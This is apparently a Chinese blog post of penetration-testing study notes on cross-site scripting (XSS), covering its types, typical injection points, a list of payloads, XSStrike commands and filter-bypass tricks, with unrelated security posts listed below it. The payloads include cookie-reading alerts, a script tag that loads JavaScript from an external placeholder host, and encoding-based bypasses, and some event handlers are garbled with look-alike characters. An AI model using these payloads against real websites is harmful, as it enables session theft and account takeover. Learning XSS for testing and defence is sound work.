渗透测试学习15:XSS

最新推荐文章于 2024-03-01 15:37:21 发布
最新推荐文章于 2024-03-01 15:37:21 发布
阅读量384 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44315099/article/details/114697501
版权

目录

简述

  • 反射型xss
  • 存储型xss
  • DOM型xss
    DOM是一个不用经过后端就可以访问或修改程序和脚本的接口。
    DOM型xss可以通过url传入控制参数。

手工测试

出现xss漏洞的场景:

  • url
    例子:xxx.com/xx.php?id=1这种,id=??这就是一个输入点
  • 搜索框
    可以查看源码,看看有没有过滤,可不可以绕过。
  • 上传图片
    <img src="#{image}"/>
    payload:1" onerror="alert(1)
    结果:<img src="1" onerror="alert(1)"/>
    注:结果为上传图片"1",onerror:出错则执行后面的语句。
    payload:javascript:alert(1)"
    结果:<img src="javascript:alert(1)"/>
    注:javascript伪协议。
  • 注册
    <input value="#{text}"/>
    payload:1" onclick="alert(1)
    结果:<input value="1"onclick="alert(1)"/>
    注:onclick 事件会在对象被点击时发生。
  • 富文本

常用载荷

> 都可以用 // 代替, 例如 <script>alert(1)</script//
script标签:script标签是最直接的XSS有效载荷,脚本标记可以引用外部的JavaScript代码,也可以将代码插入脚本标记中

<script>alert("hack")</script>   #弹出hack
<script>alert(/hack/)</script>   #弹出hack
<script>alert(1)</script>        #弹出1,对于数字可以不用引号
<script>alert(document.cookie)</script>      #弹出cookie
<script src=http://xxx.com/xss.js></script>  #引用外部的xss

svg标签
<svg onload=alert(1)>
<svg onload=alert(1)//

img标签:

<img src=1 onerror=alert("hack")>
<img src=1 onerror=alert(document.cookie)> #弹出cookie

body标签:
<body onload=alert(1)><body onpageshow=alert(1)>

video标签:
<video οnlοadstart=alert(1) src="/media/hack-the-planet.mp4" />

style标签:
<style οnlοad=alert(1)></style>

工具测试

xsstrike:
GET方法:python3 xsstrike.py -u "http://example.com/search.php?q=query"
POST方法:python3 xsstrike.py -u "http://example.com/search.php" --data "q=query"
其他用法见https://github.com/s0md3v/XSStrike/wiki/Usage

绕过姿势

  • 可以尝试换一种标签的载荷
  • 双写,大小写
  • 关闭标签
    例子:“><script>alert(“Hi”);</script>
  • 绕过magic_quotes_gpc
    magic_quotes_gpc=ON是php中的安全设置,开启后会把一些特殊字符进行轮换,比如’(单引号)转换为\’,”(双引号)转换为\”,\转换为\
    可以通过javascript中的String.fromCharCode方法来绕过,我们可以把alert(“XSS”);转换为
    String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34,41)
  • 编码
    常用编码:url编码、HTML实体编码、JavaScript编码
lrczzZ
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试--xss
酷狗直播-锦凡歆的博客
12-22 724
作者: 锦凡歆在‘来疯’直播唱歌最好听 跨站脚本攻击 XSS 漏洞概述 - 简介 XSS 作为OWASP TOP 10 之一, XSS 被称为跨站脚本攻击(Cross-site scripting),本来应该缩写为CSS,但是由于和CSS(Cascading Style Sheets,层叠样式脚本)重名,所以更名为XSSXSS(跨站脚本攻击)主要基于javascrip...
渗透测试-XSS
SK1ng的博客
10-03 2625
XSS 原理 XSS 即跨站脚本攻击(Cross Site Script),通过构造代码(JS)注入网页中,并由浏览器解释运行这段JS代码,以达到恶意攻击的效果。当用户访问被XSS脚本注入的网页,XSS脚本就会被提取出来。用户浏览器就会解析这段浏览器代码,也就是用户被攻击了 微博、留言板、聊天室、订单等等收集用户输入的地方,都有可能被注入XSS 代码,都存在遭受XSS 攻击的风险,只要没有对用户的输入进行严格的过滤,就会被XSS 攻击 危害 盗取各种用户账户 盗取用户Cookie资料,冒充用户身份进入网
burpsuite靶场系列之客户端漏洞篇 - 跨站脚本(XSS)专题
weixin_50464560的博客
04-14 3267
https://www.anquanke.com/post/id/245953 本系列介绍 PortSwigger是信息安全从业者必备工具burpsuite的发行商,作为网络空间安全的领导者,他们为信息安全初学者提供了一个在线的网络安全学院(也称练兵场),在讲解相关漏洞的同时还配套了相关的在线靶场供初学者练习,本系列旨在以初学者视角出发对学习该学院内容及靶场练习进行全程记录并为其他初学者提供学习参考,希望能对初学者们有所帮助。 客户端漏洞篇介绍 相对于服务器端漏洞篇,客户端漏洞篇会更加复杂
"><img src=1 onerror=alert(1)>
"><img src=1 onerror=alert(1)>
05-30 3727
">
xss(跨站攻击)
m0_74456293的博客
03-20 2698
xss(跨站攻击)
XSS姿势——文件上传XSS
haha1314的博客
04-22 3917
XSS姿势——文件上传XSS 文件上传xss,一般都是上传html文件导致存储或者反射xss,一般文件内容都是html。 1、把以下代码写入文件,后缀改成图片格式。 <html> <body> <img src=1 onerror=alert(1)> </body> </html> 2、或者将后缀名改为htm...
复现一个循环问题和两个循环问题
middlecorn的博客
08-07 98
网络安全
xsser_platform:《 Web安全攻防:渗透测试实战指南》 XSS测试平台原始码
03-23
描述中的信息进一步确认了这个项目是与XSS渗透测试相关的,源自一本专门讨论Web安全和渗透测试的书籍。"XSS测试平台原始码"强调了这是一套用于教学和实践的工具,通过查看和运行源代码,读者可以学习如何检测、防范...
第04篇:XSS三重URL编码绕过实例1
08-03
跨站脚本攻击(XSS)是一种常见的网络安全漏洞,...在进行渗透测试时,保持耐心和细心,勇于质疑,持续学习,是提升安全能力的关键。时刻关注安全最佳实践,确保代码的安全性,才能有效地对抗XSS和其他类型的网络攻击。
【推荐】最新超全的渗透测试学习基础教程集合(84份).zip
08-04
最新超全的渗透测试学习基础教程集合,新手、大佬都可以阅读: 01.入门笔记之看雪Web安全学习及异或解密示例; 02.Chrome浏览器保留密码功能渗透解析及登录加密入门笔记; 03.Burp Suite工具安装配置、Proxy基础用法...
#资源分享达人# 《Python渗透测试编程技术 方法与实践》_李华峰.zip
08-03
总的来说,《Python渗透测试编程技术 方法与实践》这本书提供了全面的Python渗透测试知识体系,适合对网络安全感兴趣,尤其是希望通过Python进行渗透测试的读者学习。通过阅读和实践书中的内容,读者不仅可以掌握...
超全的Web渗透自我学习资料合集(64篇).zip
09-30
web渗透: web渗透测试清单 web渗透: 自动化漏洞扫描 web渗透: Google Hacking web渗透: web服务器指纹识别 web渗透: 枚举web服务器应用 web渗透: 识别web应用框架 web渗透: 配置管理测试 web渗透: 身份管理测试 web...
XSS练习
sinat_42420072的博客
03-01 361
为什么一天发两个才有券啊啊啊啊。
白帽子之web漏洞--xss攻击
鼓浪屿岛与海的博客
12-04 481
本文仅供学习,不支持一切以不法利益为目的的商业攻击 一.xss攻击原理 xss 是“跨站脚本攻击”,是一种注入攻击,当web应用对用户输入过滤的不严格时,攻击者写入恶意的脚本(CSS,HTML,JavaScript)到网页中时,如果访问了含有恶意代码的页面,恶意脚本就会被浏览器解析执行导致用户被攻击 二.常见xss危害 cookie窃取,session劫持,钓鱼攻击,蠕虫,ddos等。 ...
BugKu Web WriteUp
AlexYoung28的博客
08-24 2219
Web 8 这道题的代码和前面的文件包含写的思路一样, 我们都是运用  php://input 写,来实现我们从文件中读出的数据和我们传入的数据一样。 我写的如下:  只要保证  $ac  的值 和我们写入文件  $fn 的值 一样即可, 我这里都写的是 123 细心 这道题刚开始看到主页之后,又看了源代码和抓了包,发现都没有什么特别的地方,所以,只有拿御剑扫描一下后台。 ...
xss-labs 通关笔记
Ewige的博客
06-30 496
靶场地址:传送门 概述: XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 反射型XXS是一种非持久性的攻击,它指的是恶意攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的目的。这里插入的恶意代码并没有保存在目标网站,需要引诱用户点击一个链接到目标网站的恶意链接来实施攻击。 原文链接:ht
Web攻防第 03 讲:XSS跨站脚本攻击
分享日常工作技术
12-31 1275
主要基于JS脚本进行恶意攻击行为 一、XSS的危害 XSS利用JS代码实现攻击,有很多种攻击方法,一下简单列出多种 盗取各种用户账号 盗取用户Cookie资料,冒充用户身份进入网站 劫持用户会话,执行任意操作 刷流量,执行弹窗广告 传播蠕虫病毒 二、XSS漏洞的验证方法 我们可以用一段简单的代码来验证和检查漏洞的存在,这样的代码叫POC(Proof of Concept) POC:漏洞的验证与检测 EXP:漏洞的完整利用工具 shellcode:利用漏洞时,所执行的代码 ...
XSS实战1(http://test.ctf8.com/)
Bob_Box的博客
04-12 1184
要求:显示弹窗即为过关 level1 通过修改URL中参数name发现页面test也会被修改,尝试修改name的值 ?name=<script>alert(/nice/)</script> level2 存在文本框,输入<script>alert(/nice/)</script>,页面返回如下,F12查看源码 接下来我们输入单引号,结果如下 再然后输入双引号,结果如下 由此得出value值为双引号闭合,尝试闭合标签.
2024-2030全球与中国硅胶婴儿用品市场现状及未来发展趋势 Sample-Li Jinpan.pdf
最新发布
09-05
QYResearch是全球知名的大型咨询公司,行业涵盖各高科技行业产业链细分市场,横跨如半导体产业链(半导体设备及零部件、半导体材料、集成电路、制造、封测、分立器件、传感器、光电器件)、光伏产业链(设备、硅料/硅片、电池片、组件、辅料支架、逆变器、电站终端)、新能源汽车产业链(动力电池及材料、电驱电控、汽车半导体/电子、整车、充电桩)、通信产业链(通信系统设备、终端设备、电子元器件、射频前端、光模块、4G/5G/6G、宽带、IoT、数字经济、AI)、先进材料产业链(金属材料、高分子材料、陶瓷材料、纳米材料等)、机械制造产业链(数控机床、工程机械、电气机械、3C自动化、工业机器人、激光、工控、无人机)、食品药品、医疗器械、农业等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值